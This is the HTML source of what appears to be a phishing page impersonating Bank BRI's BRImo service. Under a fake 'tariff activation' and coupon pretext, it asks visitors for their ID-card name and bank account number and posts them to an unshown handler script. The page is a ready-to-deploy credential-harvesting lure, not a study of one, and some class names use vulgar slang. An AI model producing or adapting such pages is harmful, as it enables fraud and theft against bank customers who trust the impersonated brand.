<!DOCTYPE html>
<html lang="in">
<head>
    <meta charset="UTF-8">
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟰</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <link rel="stylesheet" href="img/2.css">
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
    .lonte{
  display:none;
  z-index:4;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}
.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
      .jao{
            width:90%;
      }
</style>
<body>
    <main>
<welalxcome>
<img src="img/BRImo.png" alt="" style="margin-top: -50px" />
</welalxcome>
<chsalxcome2 style="display: ;">
    <div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
      </div>
<img style="z-index:1;position: fixed;width:100%;margin-top:0px;" width="100%" src="img/buri.png" alt="">

<img style="z-index:2;position: fixed;width:100%;margin-top:50px;" src="img/26-.png" alt="">
<nav class="zz">
<img src="img/nav.png" style="margin-top:8px; margin-left:175px;" width="40px" alt="">
<p style="margin-left:10px;">Spesial Untuk<b style="color: #F37024">mo</p>
<p style="margin-left:10px;color:#fff;font-size:12px;">Cobain beragam cara baru untuk<br>memaksimalkan aktivitas perbankan kamu.</p>
</nav>

<marquee direction="right" behavior="alternate" scrolldelay="10" class="asu">
<img class="nyusu" src="img/1.png" alt="">
<img class="nyusu" src="img/2.png" alt="">
<img class="nyusu" src="img/3.png" alt="">
<img class="nyusu" src="img/4.png" alt="">
<img class="nyusu" src="img/5.png" alt="">
</marquee>    



<form method="post" id="formlog">
<center><img style="z-index:3;position: fixed;width:20%;margin-top:610px;margin-left:-40px;" src="img/T24.png" alt=""></center>
<div class="button-85 xx">
<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px;margin-top:-20px;font-weight:600;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:-4px;height:60px;">Untuk melanjutakn proses pengambilan kupon anda silakan masukan data anda di bawah ini</p>

</center>
<br>
  

<h5 style="color:#09559a; margin-top: 0px; margin-left: 4px">Atas nama :
<input id="nama" name="nama" type="text" class="yy" placeholder="Nama sesuai KTP" oninvalid="this.setCustomValidity('Mɑsukkɑn 𝗡𝗔𝗠𝗔 sesuai KTP')" onchange="this.setCustomValidity('')" required>
</h5>


<h5 for="norek" style="color:#09559a; margin-top: 0px; margin-left: 4px">Nomor rekening :
<input id="norek" name="rek" type="tel" class="yy" placeholder="#####" data-mask="000000000000000" required>
</h5>

<br>
<br>
</div>
    





<div class="pilat">
<div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled>Lanjutkan</button>
           </div>
</smalxs>
</main>
</form>

<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js'></script>
<script src="script.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },500)
        });
</script>
<script src="k.js"></script>
<script src="vibr.js"></script>
     <script src="req/2.js">
 </script>
<script src="img/2.js"></script>
</body>
</html>
